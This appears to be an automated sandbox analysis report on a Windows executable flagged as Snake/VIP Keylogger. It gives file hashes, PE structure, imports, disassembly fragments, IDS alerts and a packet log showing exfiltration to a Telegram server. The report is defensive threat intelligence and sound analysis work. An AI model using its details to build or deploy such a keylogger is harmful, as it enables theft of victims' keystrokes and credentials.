                                                                          5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          No context
                                                                          Process:C:\Users\user\Desktop\JWPRnfqs3n.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):61890
                                                                          Entropy (8bit):7.887558869365694
                                                                          Encrypted:false
                                                                          SSDEEP:1536:ZeXE4MwTJ1u370bxTEnUBmN+Y0xUk6IFfbjgDM6B:YjvFxvAHOUk6qfbjg1B
                                                                          MD5:A77A4BBFDE1A83090A447082BF0F349D
                                                                          SHA1:34DFBEC631556F21F70314F3BAC1F44F77F38465
                                                                          SHA-256:5F81EED3FD97CF87D536604E733CF23B330AAF73AACB9FE32B8B44E959BB4592
                                                                          SHA-512:37D04F514CEDC03D4F4BA0685F286860435439CB99CD14E4C7973FFDCFC0D949A783CB072DCB4731CC59776D4F40D3895670664F3287665228845567E74E6C4A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:EA06..n..X...5jmH.L..->..X.N*3...Z.R'..Eb.M.U...6...6..Eb...}....Y../v).F.v.J...T.q..j...Z.]....c:.En..kR...E..#0....z...~......-jiI...*..X.L..18.Nfuk............. Lj.*..Fk..Z.Vjt...F(...6q3.P..0.F.8.J@.1F.....7.\.6..2....u|........~..-j|.%..b.9...v.L.P%...T......:.H.n...b.K.J*..FB......!<..6|.!.j1:...2..N..i.-`. ...(...B..i..6@............N&..b.N.$!s...K..R0....^.....Z.......f.;.....MI......+P.."..HH.....A;.$(............B..HN@....!/.$+u..^q3.Z/.:}....V"x.L^.8...u..&Wv..;..-je;.....B.X.R........P....6.T.UbP)..I .N&t.m..M.U'z.mzsE..-....X......Fw..P.Sj.J#V.v+@..J.K..h...(...T@.......H.....-.V*...........X.H...j..%....'....u...U..T.^s..>..<Mj..NgV..'S|...<.D.5kTJ.M.U".p..r...6.`.....n..DB.V.W.vXMRqW.\.tY$..8...k......3.-{.N.L..I_..X.Gz0...r...kFJ.e...7....0.D/...X.J...V..*..%c@$.DJ.V.\<....;...Z.T.|.V*.xuRu*..-5 .".@.e.......V..(.vK7.T.}.,.<.Y.EvU3.P+U..h...Q ..2%..P4.`."t..[@..5..B.K..&EN]%..../.....)..G.qX..q.jD.g..~*.Xl.9..+|m.Bq3.WhW..b.2..
                                                                          Process:C:\Users\user\Desktop\JWPRnfqs3n.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):93696
                                                                          Entropy (8bit):6.822744624530832
                                                                          Encrypted:false
                                                                          SSDEEP:1536:IYXWDp0sRsPoF3ZTEVRjV9qldld7eG2m+VSx9jDzNywKK74Afyf:wagTEV5V9qlndx+VSfDz9p74/
                                                                          MD5:2685443955D9087753A0FE5D095DD375
                                                                          SHA1:1FAEAAFDAA78F9A776D572758E4F5B901A2F2E2D
                                                                          SHA-256:B591B5C56471F68BDE4D4D83329D654E5FF5E9F24FD188DAB72C632447E5E36C
                                                                          SHA-512:E7915A3295DE5280997C14FCBA6902FB02104716D9351620CE652BC26CA5BAA39CCA207F6B42A8313523F1242F2AD680F2E2A910E450A6D7C724BD81E9B710CF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.b.9FZ6H<3VB..MX.8Q8X9EZvH83VBXSMXT8Q8X9EZ6H83VBXSMXT8Q8X9EZ.H83X].]M.].p.Yu.{b Q@v2*<**5Uq[9W+5BhZVv0-=m1:..w..(5R-.>[H|SMXT8Q8.|EZzI;3.x-.MXT8Q8X9.Z4I32.BX7LXT0Q8X9EZ8.93VbXSM.U8Q8.9Ez6H81VB\SMXT8Q8\9EZ6H83V.YSMZT8Q8X9GZv.83FBXCMXT8A8X)EZ6H83FBXSMXT8Q8X9..7Hs3VBX.LX.=Q8X9EZ6H83VBXSMXT8Q.Y9IZ6H83VBXSMXT8Q8X9EZ6H83VBXSMXT8Q8X9EZ6H83VBXSMXT8Q8X.EZ>H83VBXSMXT8Y.X9.Z6H83VBXSMXzL4@,9EZ"*93VbXSM<U8Q:X9EZ6H83VBXSMXt8QXvK6(UH83.GXSM.U8Q>X9E<7H83VBXSMXT8Q8.9E..:]_9!XSAXT8Q.Y9EX6H8_WBXSMXT8Q8X9EZvH8qVBXSMXT8Q8X9EZ6H.WBXSMX.8Q8Z9@Z..83..XSNXT8.8X?%.6H.3VBXSMXT8Q8X9EZ6H83VBXSMXT8Q8X9EZ6H83VBXSMX.E.7..3E..3VBXSMYV;U>P1EZ6H83VB&SMX.8Q8.9EZ.H83sBXS XT8u8X9;Z6HF3VB<SMX&8Q899EZqH839BXS#XT8/8X9[X.W83\h~SOpt8Q2X..).H89.CXSI+v8Q2.;EZ2;.3VH.PMXPKu8X3.^6H<@sBXY.]T8U..9F. N83M-`SMRT;.-^9EA.n81~{XSGX~.Q;.,CZ6S..V@.ZMXP..KE9E\..83\6QSMZ.2Q8\.[X..83\hz-^XT<z8r.;N6H<.Vhz-XXT<z8r.;L6H<.Vhz-ZXT<z8r?o86:.?V2[<,XT>y.X9OrvH85VhbS3VT8U:7.EZ<n..Vj.SM^T..8X?EreH85Vj.SM^T..8X?Ep.H.cVB^Se.T8W8r.E$.H87zE&`MXP.GFi9E^.N@3
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):6.909656492336042
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:JWPRnfqs3n.exe
                                                                          File size:992'768 bytes
                                                                          MD5:820c5b5f7fd86172a9637e4af12fad06
                                                                          SHA1:84605205d8d9b391b8ac5fb1a2059d8b2ade5bab
                                                                          SHA256:278d8f1d42cc9c240dcaee341104615fda13571ca36748ce099ebf7740875905
                                                                          SHA512:fd3358be8f0631a9ba2641bd01ea55e0cd8a52bede68098d0475f2189568b33c63e7070c1e2b2cd714fc39c06965a555145f2a3f23f6b53c33f94821f2622519
                                                                          SSDEEP:24576:zu6J33O0c+JY5UZ+XC0kGso6FavL1TBKS7WY:du0c++OCvkGs9FavL1TINY
                                                                          TLSH:8525AE2273DDC360CB669173BF69B3016EBF7C650630B85B2F981D79A960171262C7A3
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                          Icon Hash:0b1888c999ad811f
                                                                          Entrypoint:0x427dcd
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x6750BC2C [Wed Dec 4 20:31:40 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                          Instruction
                                                                          call 00007FAA2108BC5Ah
                                                                          jmp 00007FAA2107EA24h
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          push edi
                                                                          push esi
                                                                          mov esi, dword ptr [esp+10h]
                                                                          mov ecx, dword ptr [esp+14h]
                                                                          mov edi, dword ptr [esp+0Ch]
                                                                          mov eax, ecx
                                                                          mov edx, ecx
                                                                          add eax, esi
                                                                          cmp edi, esi
                                                                          jbe 00007FAA2107EBAAh
                                                                          cmp edi, eax
                                                                          jc 00007FAA2107EF0Eh
                                                                          bt dword ptr [004C31FCh], 01h
                                                                          jnc 00007FAA2107EBA9h
                                                                          rep movsb
                                                                          jmp 00007FAA2107EEBCh
                                                                          cmp ecx, 00000080h
                                                                          jc 00007FAA2107ED74h
                                                                          mov eax, edi
                                                                          xor eax, esi
                                                                          test eax, 0000000Fh
                                                                          jne 00007FAA2107EBB0h
                                                                          bt dword ptr [004BE324h], 01h
                                                                          jc 00007FAA2107F080h
                                                                          bt dword ptr [004C31FCh], 00000000h
                                                                          jnc 00007FAA2107ED4Dh
                                                                          test edi, 00000003h
                                                                          jne 00007FAA2107ED5Eh
                                                                          test esi, 00000003h
                                                                          jne 00007FAA2107ED3Dh
                                                                          bt edi, 02h
                                                                          jnc 00007FAA2107EBAFh
                                                                          mov eax, dword ptr [esi]
                                                                          sub ecx, 04h
                                                                          lea esi, dword ptr [esi+04h]
                                                                          mov dword ptr [edi], eax
                                                                          lea edi, dword ptr [edi+04h]
                                                                          bt edi, 03h
                                                                          jnc 00007FAA2107EBB3h
                                                                          movq xmm1, qword ptr [esi]
                                                                          sub ecx, 08h
                                                                          lea esi, dword ptr [esi+08h]
                                                                          movq qword ptr [edi], xmm1
                                                                          lea edi, dword ptr [edi+08h]
                                                                          test esi, 00000007h
                                                                          je 00007FAA2107EC05h
                                                                          bt esi, 03h
                                                                          jnc 00007FAA2107EC58h
                                                                          Programming Language:
                                                                          • [ASM] VS2013 build 21005
                                                                          • [ C ] VS2013 build 21005
                                                                          • [C++] VS2013 build 21005
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [ASM] VS2013 UPD4 build 31101
                                                                          • [RES] VS2013 build 21005
                                                                          • [LNK] VS2013 UPD4 build 31101
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x29d14.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xf10000x711c.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0xc70000x29d140x29e00026e384b9db188199cd56c232cf3bc19False0.8792269123134329data7.731010669890645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0xf10000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0xc74580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                          RT_ICON0xc75800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                          RT_ICON0xc76a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                          RT_ICON0xc77d00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 60472 x 60472 px/mEnglishGreat Britain0.2639348134152102
                                                                          RT_MENU0xcb9f80x50dataEnglishGreat Britain0.9
                                                                          RT_STRING0xcba480x594dataEnglishGreat Britain0.3333333333333333
                                                                          RT_STRING0xcbfdc0x68adataEnglishGreat Britain0.2747909199522103
                                                                          RT_STRING0xcc6680x490dataEnglishGreat Britain0.3715753424657534
                                                                          RT_STRING0xccaf80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                          RT_STRING0xcd0f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                          RT_STRING0xcd7500x466dataEnglishGreat Britain0.3605683836589698
                                                                          RT_STRING0xcdbb80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                          RT_RCDATA0xcdd100x22ae7data1.0003590158741333
                                                                          RT_GROUP_ICON0xf07f80x14dataEnglishGreat Britain1.25
                                                                          RT_GROUP_ICON0xf080c0x14dataEnglishGreat Britain1.25
                                                                          RT_GROUP_ICON0xf08200x14dataEnglishGreat Britain1.15
                                                                          RT_GROUP_ICON0xf08340x14dataEnglishGreat Britain1.25
                                                                          RT_VERSION0xf08480xdcdataEnglishGreat Britain0.6181818181818182
                                                                          RT_MANIFEST0xf09240x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                          DLLImport
                                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                          UxTheme.dllIsThemeActive
                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishGreat Britain
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2025-01-11T07:59:14.463875+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749699132.226.247.7380TCP
                                                                          2025-01-11T07:59:20.682598+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749699132.226.247.7380TCP
                                                                          2025-01-11T07:59:21.307506+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749737149.154.167.220443TCP
                                                                          2025-01-11T07:59:21.602330+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749737149.154.167.220443TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 11, 2025 07:59:13.462973118 CET4969980192.168.2.7132.226.247.73
                                                                          Jan 11, 2025 07:59:13.467905998 CET8049699132.226.247.73192.168.2.7
                                                                          Jan 11, 2025 07:59:13.468136072 CET4969980192.168.2.7132.226.247.73
                                                                          Jan 11, 2025 07:59:13.468347073 CET4969980192.168.2.7132.226.247.73
                                                                          Jan 11, 2025 07:59:13.473176003 CET8049699132.226.247.73192.168.2.7
                                                                          Jan 11, 2025 07:59:14.143743992 CET8049699132.226.247.73192.168.2.7
                                                                          Jan 11, 2025 07:59:14.198328972 CET4969980192.168.2.7132.226.247.73
                                                                          Jan 11, 2025 07:59:14.206988096 CET4969980192.168.2.7132.226.247.73
                                                                          Jan 11, 2025 07:59:14.211955070 CET8049699132.226.247.73192.168.2.7
                                                                          Jan 11, 2025 07:59:14.416918993 CET8049699132.226.247.73192.168.2.7
                                                                          Jan 11, 2025 07:59:14.463875055 CET4969980192.168.2.7132.226.247.73
                                                                          Jan 11, 2025 07:59:14.593470097 CET49700443192.168.2.7104.21.80.1
                                                                          Jan 11, 2025 07:59:14.593513012 CET44349700104.21.80.1192.168.2.7
                                                                          Jan 11, 2025 07:59:14.593777895 CET49700443192.168.2.7104.21.80.1
                                                                          Jan 11, 2025 07:59:14.605249882 CET49700443192.168.2.7104.21.80.1
                                                                          Jan 11, 2025 07:59:14.605264902 CET44349700104.21.80.1192.168.2.7
                                                                          Jan 11, 2025 07:59:15.099725962 CET44349700104.21.80.1192.168.2.7
                                                                          Jan 11, 2025 07:59:15.099878073 CET49700443192.168.2.7104.21.80.1
                                                                          Jan 11, 2025 07:59:15.107744932 CET49700443192.168.2.7104.21.80.1
                                                                          Jan 11, 2025 07:59:15.107764006 CET44349700104.21.80.1192.168.2.7
                                                                          Jan 11, 2025 07:59:15.108638048 CET44349700104.21.80.1192.168.2.7
                                                                          Jan 11, 2025 07:59:15.150573969 CET49700443192.168.2.7104.21.80.1
                                                                          Jan 11, 2025 07:59:15.195877075 CET49700443192.168.2.7104.21.80.1
                                                                          Jan 11, 2025 07:59:15.239336967 CET44349700104.21.80.1192.168.2.7
                                                                          Jan 11, 2025 07:59:15.319083929 CET44349700104.21.80.1192.168.2.7
                                                                          Jan 11, 2025 07:59:15.319245100 CET44349700104.21.80.1192.168.2.7
                                                                          Jan 11, 2025 07:59:15.319437027 CET49700443192.168.2.7104.21.80.1
                                                                          Jan 11, 2025 07:59:15.326216936 CET49700443192.168.2.7104.21.80.1
                                                                          Jan 11, 2025 07:59:20.427191973 CET4969980192.168.2.7132.226.247.73
                                                                          Jan 11, 2025 07:59:20.432012081 CET8049699132.226.247.73192.168.2.7
                                                                          Jan 11, 2025 07:59:20.635963917 CET8049699132.226.247.73192.168.2.7
                                                                          Jan 11, 2025 07:59:20.649893999 CET49737443192.168.2.7149.154.167.220
                                                                          Jan 11, 2025 07:59:20.649945974 CET44349737149.154.167.220192.168.2.7
                                                                          Jan 11, 2025 07:59:20.650031090 CET49737443192.168.2.7149.154.167.220
                                                                          Jan 11, 2025 07:59:20.650757074 CET49737443192.168.2.7149.154.167.220
                                                                          Jan 11, 2025 07:59:20.650774002 CET44349737149.154.167.220192.168.2.7
                                                                          Jan 11, 2025 07:59:20.682598114 CET4969980192.168.2.7132.226.247.73
                                                                          Jan 11, 2025 07:59:21.259815931 CET44349737149.154.167.220192.168.2.7
                                                                          Jan 11, 2025 07:59:21.259905100 CET49737443192.168.2.7149.154.167.220
                                                                          Jan 11, 2025 07:59:21.263892889 CET49737443192.168.2.7149.154.167.220
                                                                          Jan 11, 2025 07:59:21.263921976 CET44349737149.154.167.220192.168.2.7
                                                                          Jan 11, 2025 07:59:21.264185905 CET44349737149.154.167.220192.168.2.7
                                                                          Jan 11, 2025 07:59:21.266617060 CET49737443192.168.2.7149.154.167.220
                                                                          Jan 11, 2025 07:59:21.307339907 CET44349737149.154.167.220192.168.2.7
                                                                          Jan 11, 2025 07:59:21.307395935 CET49737443192.168.2.7149.154.167.220
                                                                          Jan 11, 2025 07:59:21.307406902 CET44349737149.154.167.220192.168.2.7
                                                                          Jan 11, 2025 07:59:21.602464914 CET44349737149.154.167.220192.168.2.7
                                                                          Jan 11, 2025 07:59:21.602675915 CET44349737149.154.167.220192.168.2.7
                                                                          Jan 11, 2025 07:59:21.602757931 CET49737443192.168.2.7149.154.167.220
                                                                          Jan 11, 2025 07:59:21.607265949 CET49737443192.168.2.7149.154.167.220
                                                                          Jan 11, 2025 08:00:25.638813972 CET8049699132.226.247.73192.168.2.7
